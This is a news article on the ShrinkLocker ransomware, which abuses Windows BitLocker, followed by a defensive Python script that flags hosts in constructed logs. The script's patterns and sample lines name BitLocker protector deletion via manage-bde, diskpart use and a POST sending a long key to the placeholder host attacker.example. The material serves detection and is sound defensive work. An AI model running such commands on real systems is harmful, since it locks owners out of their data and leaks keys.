Security software company Kaspersky Lab has recently detected a new ransomware strain called ShrinkLocker that exploits Windows’ BitLocker security function. The malicious software restricts access to a device until a ransom is paid to unlock it. Kaspersky Lab has offered advice on how to protect against potential data blocking.
Understanding BitLocker and ShrinkLocker
BitLocker is a disk encryption tool, first introduced in Windows Vista in 2007. It is used to secure entire volumes of data from unauthorized access, especially in cases of physical disk access. From Windows 10 onwards, BitLocker uses 128-bit and 256-bit XTS-AES encryption algorithms for added protection against manipulation-based attacks.
ShrinkLocker, detected in Mexico, Indonesia, and Jordan, uses BitLocker in a unique way. It shrinks the size of each logical disk by 100MB and then creates new, similarly-sized partitions from the freed-up space, hence the term ShrinkLocker.
Persistent and Evolving Threats
According to experts, cybercriminals continue to evolve their tactics to evade detection. In this case, they utilized a legitimate encryption function to block user access to files. Earlier instances of BitLocker use by malicious software have been reported, such as by Iranian ransomware actors in 2022 and during an attack on the Russian firm Miratorg, which saw all files encrypted by BitLocker.
ShrinkLocker Operational Tactics
Once activated on a device, ShrinkLocker runs a Visual Basic script that uses WMI to gather information about the operating system and hardware platform. The script terminates automatically if it detects an outdated system running Windows XP, 2000, 2003, or Vista. It then proceeds to adjust disk sizes based on the Windows version while ignoring network disks to avoid triggering defense systems.
The Final Stage of the Attack
The final stage of the attack sees the disabling of BitLocker’s built-in encryption key recovery tools and the setting of a numerical password. This is done to hinder the legitimate owner’s access to the encrypted data. Subsequently, a unique 64-character password made up of numbers, letters, and special symbols is generated via a random algorithm. Upon restarting, the user is asked to input this password to decrypt the disks.
Challenges and Recommendations for Protection
Decrypting data without the encryption key is extremely difficult as each password generation algorithm is unique to the attacked system. No specific protective measures against ShrinkLocker have been developed as yet. However, Kaspersky Lab advises the following:
- Enable network traffic logging and monitoring and set up GET and POST query logs, as in case of infection, the queries to the attacker’s domain may contain passwords or keys.
- Track events related to VBS and PowerShell execution and store scripts and commands in an external repository.
- Use robust passwords and two-factor authentication wherever possible.
- Regularly back up important data.
In addition, antivirus software can help in early detection and blocking of such attacks.
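The following is an added example, not code from Kaspersky Lab’s report: a small Python script that applies the logging advice above to constructed process-creation and proxy log lines, flagging a host only when several of the behaviours described in this article (VBS execution, a disk-shrinking tool, removal of BitLocker recovery protectors, addition of a password protector, a long secret in an outbound query) occur together. The log line format, host names and the attacker.example domain are assumptions; manage-bde and diskpart are real Windows tools, but the exact ShrinkLocker command lines are not given in the article.

```python
import re
from collections import defaultdict

# Log lines in a constructed format (an assumption of this example):
#   "<timestamp> host=<name> image=<path> cmd=<command line>"   or
#   "<timestamp> host=<name> proxy=<GET|POST> url=<url>"
# The patterns match the behaviours the article describes, not a known sample.
RULES = {
    "vbs_script_host": re.compile(r"image=\S*\\[wc]script\.exe .*\.vbs\b", re.I),
    "volume_shrink_tool": re.compile(r"image=\S*\\diskpart\.exe", re.I),
    "bitlocker_protector_removed": re.compile(r"manage-bde .*-protectors .*-(?:delete|disable)\b", re.I),
    "bitlocker_password_protector_added": re.compile(r"manage-bde .*-protectors .*-add .*(?:-pw|-password)\b", re.I),
    "long_secret_in_http_query": re.compile(r"proxy=(?:GET|POST) .*[?&][\w-]+=\S{64,}", re.I),
}

def match_line(line):
    """Names of every rule that fires on a single log line."""
    return [name for name, rx in RULES.items() if rx.search(line)]

def score_hosts(lines, min_rules=2):
    """Group rule hits per host. A host is flagged only when at least min_rules
    distinct behaviours are seen, since a lone manage-bde or wscript.exe run
    is routine administration and would flood an analyst with false positives."""
    hits = defaultdict(set)
    for line in lines:
        host = re.search(r"host=(\S+)", line)
        if host:
            hits[host.group(1)].update(match_line(line))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_rules}

# Constructed sample telemetry (not real logs); attacker.example is a placeholder domain.
SAMPLE_LOG = [
    "2024-05-20T10:01:03Z host=ws-17 image=C:\\Windows\\System32\\wscript.exe cmd=wscript.exe C:\\ProgramData\\update.vbs",
    "2024-05-20T10:01:09Z host=ws-17 image=C:\\Windows\\System32\\diskpart.exe cmd=diskpart /s C:\\ProgramData\\d.txt",
    "2024-05-20T10:02:11Z host=ws-17 image=C:\\Windows\\System32\\manage-bde.exe cmd=manage-bde -protectors -delete C:",
    "2024-05-20T10:02:15Z host=ws-17 image=C:\\Windows\\System32\\manage-bde.exe cmd=manage-bde -protectors -add C: -pw",
    "2024-05-20T10:02:40Z host=ws-17 proxy=POST url=http://attacker.example/api?key=" + "A1b2" * 16,
    "2024-05-20T11:30:00Z host=srv-01 image=C:\\Windows\\System32\\manage-bde.exe cmd=manage-bde -status C:",
]

if __name__ == "__main__":
    for host, rules in score_hosts(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(rules)}")
```

The threshold is deliberately conservative; in a real deployment the same rules would be fed from Sysmon or Windows process-creation auditing and proxy logs rather than the inline sample.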